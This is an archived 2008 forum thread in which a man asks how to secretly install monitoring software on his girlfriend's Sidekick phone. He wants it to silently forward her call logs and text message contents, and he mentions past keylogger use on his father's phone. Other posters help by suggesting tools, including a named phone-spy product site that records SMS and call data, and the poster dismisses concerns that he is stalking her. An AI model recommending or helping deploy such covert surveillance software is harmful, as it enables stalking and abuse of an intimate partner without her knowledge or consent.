View Full Version : Help with recording information on cellphone please

12-07-2008, 08:45 AM
I have been dating my GF who says she loves me for a year and 2 months now, yet we seem to be drifting apart and there is no REAL reason for it that i can think of. But recently we have been going for 2 days or more at a time with out even seeing eachother.
now, i know how to use keylogers by setting them up- even have done it with a Nextel a couple years back on my dad for my mom.. long story. but the program i once used nolonger exists.
My GF is using a Tmobile sidekick2008 - does anyone know of any recording software that i can slip into her phone and silently send the numbers of whom she is texting / calling along with the contents of the text messages she recieves and sends?

Please, and Thank you in advance-


12-07-2008, 01:27 PM
I don't know if this is compatible, but you can check.
You also might want to check this.

12-07-2008, 05:14 PM
Thanks for the help, seems that software doesn't support a sidekick. and hey- im no stalker, i just feel as if i need to see if my time with her was well-spent and if it has a future. you know?

12-17-2008, 03:37 AM
You may try mobile spy (http://www.spy-mobile-phone.com/)
It can record SMS (text message) and call information